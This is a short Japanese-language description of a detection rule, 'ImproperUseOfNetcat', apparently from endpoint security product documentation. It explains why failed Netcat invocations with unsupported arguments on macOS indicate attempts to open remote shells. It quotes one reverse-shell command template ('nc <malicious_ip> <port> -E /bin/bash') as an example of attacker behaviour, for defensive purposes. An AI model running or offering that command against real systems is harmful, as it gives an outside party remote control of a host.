ImproperUseOfNetcat Analytics は、Netcat コマンドの実行を検出します。これは、リモートシェルセッションを開始するのによく使われるもので、疑わしいサポートされていないプロセス引数が指定されます。
スレッドアクターは頻繁に Netcat を使用して、複数のエンドポイントをまたがるネットワーク接続を行い、ネットワーク内でプレゼンスを確立すると C2 (コマンドとコントロール) サーバへのリモートセッションを行います。リモートセッションが確立されると、スレッドアクターは、ネットワークの外からホストエンドポイントと通信を行い、コントロールすることができます。他の Unix ベースのシステムでは、nc <malicious_ip> <port> -E /bin/bash のように、Netcat で -E 引数を使用すると、リモート接続を介して特定のプログラムを実行できます。しかし、macOS の Netcat は -E 引数をサポートしておらず、使用が失敗していることは悪意を示すものになります。ペネトレーションテスターも本当のスレッドアクターもこの間違いをよく犯します。
このタイプの脅威の詳細については、MITRE ATT&CK Tactic:Lateral Movement (ラテラルムーブメント) および MITRE ATT&CK Technique:Remote Services (リモートサービス) を参照してください。